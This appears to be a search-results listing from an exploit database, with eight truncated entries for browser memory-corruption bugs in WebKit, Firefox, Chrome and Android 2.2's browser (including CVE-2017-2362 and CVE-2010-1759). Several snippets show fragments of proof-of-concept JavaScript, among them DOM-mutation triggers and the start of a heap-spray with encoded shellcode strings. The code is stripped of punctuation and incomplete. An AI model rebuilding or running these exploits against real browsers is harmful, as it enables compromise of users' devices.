8 matches found
Apple WebKit: HTMLFormElement::reset() use-after-free (CVE-2017-2362)
PoC: function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo Analysis: The bug is in HTMLFormElement::reset function, specifically in this part: for auto& associatedElement :...
Apple WebKit - HTMLFormElement::reset() Use-After Free Exploit
Exploit for macOS platform in category dos / poc function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo associatedElement downcastassociatedElement.reset; The issue is that while...
Apple WebKit - HTMLFormElement::reset() Use-After Free
Apple WebKit - HTMLFormElement::reset Use-After Free function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo associatedElement downcastassociatedElement.reset; The issue is that while...
Mozilla Firefox < 50.1.0 - Use-After-Free
Mozilla Firefox 50.1.0 Use-After-Free POC. Author: Marcin Ressel. Date: 13.01.2017. Vendor Homepage: www.mozilla.org. Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/. Version: 50.1.0. Tested on: Windows 7 x64 Firefox 32 && 64 bit CV...
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
Google Chrome 26.0.1410.43 Webkit - OBJECT Element Use-After-Free PoC...
Webkit normalize bug for android 2.2 (CVE-2010-1759)
No description provided by source. CVE-2010-1759 webkit normalize bug. Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that : 2.1 - 2.3 emulator. The changes needed are documented in the code. The...
Webkit normalize bug for android 2.2 (CVE-2010-1759)
Exploit for Android platform in category remote exploits LOADING... var elem1 = document.getElementById"test1"; var elem2 = document.getElementById"test2"; var elem3 = document.getElementById"test3"; function spray for var i = 0; i 180000; i++ var s = new Stringunescape"\u0052\u0052"; //...
Webkit Normalize Bug - Android 2.2
LOADING... var elem1 = document.getElementById"test1"; var elem2 = document.getElementById"test2"; var elem3 = document.getElementById"test3"; function spray for var i = 0; i 180000; i++ var s = new Stringunescape"\u0052\u0052"; // "\u0056\u0056" FOR EMULATOR var scode = unescape"\u5200\u5200"; /...